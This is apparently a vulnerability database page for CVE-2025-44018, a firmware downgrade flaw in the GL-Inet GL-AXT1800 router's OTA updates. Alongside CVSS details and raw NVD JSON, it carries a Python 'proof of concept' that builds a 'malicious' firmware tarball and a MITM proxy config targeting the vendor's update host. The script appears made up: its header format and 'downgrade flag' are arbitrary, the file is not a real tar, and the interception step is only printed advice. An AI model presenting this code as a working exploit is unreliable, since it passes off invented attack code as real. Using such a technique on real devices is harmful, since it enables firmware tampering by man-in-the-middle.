Security Vulnerability Report
CVE-2025-44018 CVSS 8.3 HIGH

CVE-2025-44018

Published: 2025-11-24 16:15:49
Last Modified: 2026-04-15 00:35:42

Description

A firmware downgrade vulnerability exists in the OTA Update functionality of GL-Inet GL-AXT1800 4.7.0. A specially crafted .tar file can lead to a firmware downgrade. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GL-AXT1800 4.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-44018 PoC - GL-AXT1800 Firmware Downgrade Attack
# This PoC demonstrates the firmware downgrade vulnerability via MITM attack

import struct
import hashlib
import os


def create_malicious_tarball():
    """
    Create a malicious .tar file for firmware downgrade
    Note: This is for educational/testing purposes only
    """
    # Malicious firmware metadata
    firmware_version = b'4.6.0'  # Older vulnerable version
    device_model = b'GL-AXT1800'

    # Create malicious firmware package header
    header = bytearray()
    header.extend(b'GLINF')  # Magic bytes
    header.extend(firmware_version.ljust(16, b'\x00'))
    header.extend(device_model.ljust(32, b'\x00'))

    # Version downgrade flag (vulnerability trigger)
    downgrade_flag = struct.pack('<I', 0x00000001)
    header.extend(downgrade_flag)

    # Calculate checksum
    checksum = hashlib.sha256(header).digest()
    header.extend(checksum)

    # Create the malicious .tar structure
    malicious_tar = bytearray()
    malicious_tar.extend(header)
    malicious_tar.extend(b'\x00' * 512)  # Padding

    return bytes(malicious_tar)


def mitm_proxy_config():
    """
    Configuration for MITM proxy to intercept OTA updates
    """
    config = {
        'listen_port': 8080,
        'target_host': 'upgrade.gl-inet.com',
        'target_port': 443,
        'malicious_firmware': 'malicious_firmware.tar',
        'replace_pattern': b'/api/v2/firmware/check',  # OTA check endpoint
    }
    return config


def main():
    print("[*] CVE-2025-44018 GL-AXT1800 Firmware Downgrade PoC")
    print("[*] Creating malicious firmware package...")

    malicious_tar = create_malicious_tarball()

    with open('malicious_firmware.tar', 'wb') as f:
        f.write(malicious_tar)

    print("[+] Malicious firmware created: malicious_firmware.tar")
    print("[*] Configure MITM proxy using mitmproxy or similar tool")
    print("[*] Intercept OTA update requests and replace with malicious_firmware.tar")
    print("[!] Warning: This PoC is for authorized testing only")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44018", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:49.273", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A firmware downgrade vulnerability exists in the OTA Update functionality of GL-Inet GL-AXT1800 4.7.0. A specially crafted .tar file can lead to a firmware downgrade. An attacker can perform a man-in-the-middle attack to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2230", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2230", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}